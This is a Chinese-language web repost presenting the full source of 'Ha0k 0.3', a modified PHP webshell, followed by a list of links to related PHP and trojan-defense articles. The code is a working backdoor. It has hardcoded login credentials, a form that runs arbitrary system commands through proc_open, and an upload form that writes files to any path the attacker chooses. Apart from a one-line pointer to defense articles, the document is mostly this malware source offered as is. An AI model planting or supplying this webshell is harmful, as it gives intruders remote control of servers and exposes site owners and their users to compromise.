Ha0k 0.3 PHP 网页木马修改版
2015-01-24信息快讯网
Ha0k 0.3 PHP 网页木马修改版,大家可以看下,对于此类文件的防御方法,可以参考脚本之家发布的文章。
<?php //此处可设置多个用户 $passwd = array('ha0k' => 'ha0k', 'hackerdsb'=>'hackerdsb'); /* 此处设置命令的别名 */ $aliases = array('ls' => 'ipconfig', 'll' => 'ls -lvhF'); if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])|| !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { header('WWW-Authenticate: Basic realm="by Ha0k"'); header('HTTP/1.0 401 Unauthorized'); $authenticated = false; } else { $authenticated = true; /* 开始session */ session_start(); /* 初始化session. */ if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd'] = getcwd(); //取当前目录 $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if (!empty($_REQUEST['command'])) { if (get_magic_quotes_gpc()) { //0表关闭,1表开启,开启时过滤 /* We don't want to add the commands to the history in the * escaped form, so we remove the backslashes now. */ $_REQUEST['command'] = stripslashes($_REQUEST['command']); //将用addslashes()函数处理后的字符串返回原样 } /* history */ if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //查找保存数组中的值 unset($_SESSION['history'][$i]); //销毁 array_unshift($_SESSION['history'], $_REQUEST['command']);//array_unshift()函数的作用是在一个数组中插入新的元素。而这个新的数组将被添加到原数组的开头部分。函数最终返回的是插入新元素后的数组。 /* 输出Ha0k# command */ $_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "\n"; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = dirname(__FILE__); //获取当前所在目录 } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { /* The current command is a 'cd' command which we have to handle * as an internal shell command. */ if ($regs[1][0] == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $regs[1]; } else { /* Relative path, we append it to the current working * directory. */ $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { //改变当前目录 $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } else { /* The command is not a 'cd' command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); //改变目录 /* 别名扩展 */ $length = strcspn($_REQUEST['command'], " \t"); //查找\t字符串,返回位置 $token = substr($_REQUEST['command'], 0, $length); //取字符串0-\t if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); $p = proc_open($_REQUEST['command'], //执行脚本 array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* 读出发送 */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊字符为HTML字符编码 ENT_COMPAT, 'GB2312'); } /* 读出 */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'GB2312'); } fclose($io[1]); fclose($io[2]); proc_close($p);//关闭管道 } } /* 构建在JavaScript使用命令历史记录 */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将数组搞成字符串 } } header('Content-Type: text/html; charset=GB2312'); echo '<?xml version="1.0" encoding="GB2312"?>' . "\n"; ?> <?php if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); //echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name']; } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Ha0k webshell</title> <script type="text/javascript" language="JavaScript"> var current_line = 0; var command_hist = new Array(<?php echo $js_command_hist ?>); var last = 0; function key(e) { if (!e) var e = window.event; if (e.keyCode == 38 && current_line < command_hist.length-1) { command_hist[current_line] = document.shell.command.value; current_line++; document.shell.command.value = command_hist[current_line]; } if (e.keyCode == 40 && current_line > 0) { command_hist[current_line] = document.shell.command.value; current_line--; document.shell.command.value = command_hist[current_line]; } } function init() { document.shell.setAttribute("autocomplete", "off"); document.shell.output.scrollTop = document.shell.output.scrollHeight; document.shell.command.focus(); } </script> <style type="text/css"> <!-- .STYLE1 { color: #33FF33; font-weight: bold; } a:link { text-decoration: none; } a:visited { text-decoration: none; } a:hover { text-decoration: none; } a:active { text-decoration: none; } --> </style> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head> <body onload="init()"> <BODY BGCOLOR="#$$$$$$"> <BODY TEXT="1afa3a"> <h1><a href="http://hi.baidu.com/hackerdsb" class="STYLE1">HA0K</a></h1> <h6>WE JUST FOR JUSTICE,FIGHT FOR EVIAL</h6></FONT> <?php if (!$authenticated) { ?> <p>You failed to authenticate yourself to PhpShell. You can <a href="<?php echo $_SERVER['PHP_SELF'] ?>">reload</a> to try again.</p> <p>Try reading the <a href="INSTALL">INSTALL</a> file if you're having problems with installing PhpShell.</p> </body> </html> <?php // exit; } error_reporting (E_ALL); if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10; ?> <p>当前目录为: <code><?php echo $_SESSION['cwd'] ?></code></p> <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post"> <div> <textarea name="output" readonly="readonly" cols="80" rows="<?php echo $_REQUEST['rows'] ?>"> <?php $lines = substr_count($_SESSION['output'], "\n"); $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines)); echo rtrim($padding . $_SESSION['output']); ?> <</textarea> </div><br> <p class="prompt"> $ <input class="prompt" name="command" type="text" onkeyup="key(event)" size="78" tabindex="1"> </p> <p> <input type="submit" value="执行" /> <input type="submit" name="reset" value="恢复" /> 行数: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" /> </p> </form> <form enctype="multipart/form-data" action="" method="post"> <input type="hidden" name="MAX_FILE_SIZE" value="1000000"> <p>本地文件名: <input name="userfile" type="file"> <p>远程文件名: <input name="remotefile" type="text"> <input type="submit" value="发送"> </form> </body> </html>
Mcafee(麦咖啡杀毒软件) 防止网页被挂马的设置教程(最后不要在服务器端打开) 我们强烈推荐服务器安装mcafee 8.5i的版本
全世界最小的php网页木马一枚 附PHP木马的防范方法
php木马webshell扫描器代码
PHP Web木马扫描器代码 v1.0 安全测试工具
php HandlerSocket的使用
深入理解PHP原理之错误抑制与内嵌HTML分析
PHP错误抑制符(@)导致引用传参失败Bug的分析
一些PHP Coding Tips(php小技巧)[2011/04/02最后更新]
PHP中使用gettext来支持多语言的方法
PHP的cURL库功能简介 抓取网页、POST数据及其他
The specified CGI application misbehaved by not returning a complete set of HTTP headers
理解php Hash函数,增强密码安全
php iconv() : Detected an illegal character in input string
PHP多线程抓取网页实现代码
php 网页播放器用来播放在线视频的代码(自动判断并选择视频文件类型)
php下用cookie统计用户访问网页次数的代码
DedeCMS dede_channeltype表字段注释
PHP 抓取网页图片并且另存为的实现代码
PHP iconv 函数转gb2312的bug解决方法
PHP获取163、gmail、126等邮箱联系人地址【已测试2009.10.10】
PHP 日期时间函数的高级应用技巧
PHP 日期加减的类,很不错
全世界最小的php网页木马一枚 附PHP木马的防范方法
PHP 字符串分割和比较
php 获取远程网页内容的函数
PHP has encountered an Access Violation at 7C94BD02解决方法
PHP 源代码分析 Zend HashTable详解第1/3页
PHP 网页过期时间的控制代码
PHP 木马攻击防御技巧
php 木马的分析(加密破解)
php一句话cmdshell新型 (非一句话木马)
php 清除网页病毒的方法
php获取网页内容方法总结
wiki-shan写的php在线加密的解密程序
php htmlentities和htmlspecialchars 的区别
How do I change MySQL timezone?
php木马攻击防御之道